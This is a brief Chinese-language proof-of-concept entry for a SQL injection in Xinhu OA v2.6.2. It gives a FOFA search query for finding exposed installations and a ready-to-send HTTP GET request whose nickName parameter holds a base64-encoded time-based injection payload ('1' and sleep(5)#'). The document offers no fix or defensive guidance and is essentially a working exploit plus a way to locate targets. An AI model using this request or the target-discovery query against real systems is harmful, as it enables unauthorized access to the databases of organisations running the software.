信呼OAv2.6.2存在SQL注入漏洞
一、漏洞简介
信呼OAv2.6.2存在SQL注入漏洞
二、影响版本
- 信呼OA
三、资产测绘
- fofa
app="信呼-OA系统"
四、漏洞复现
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36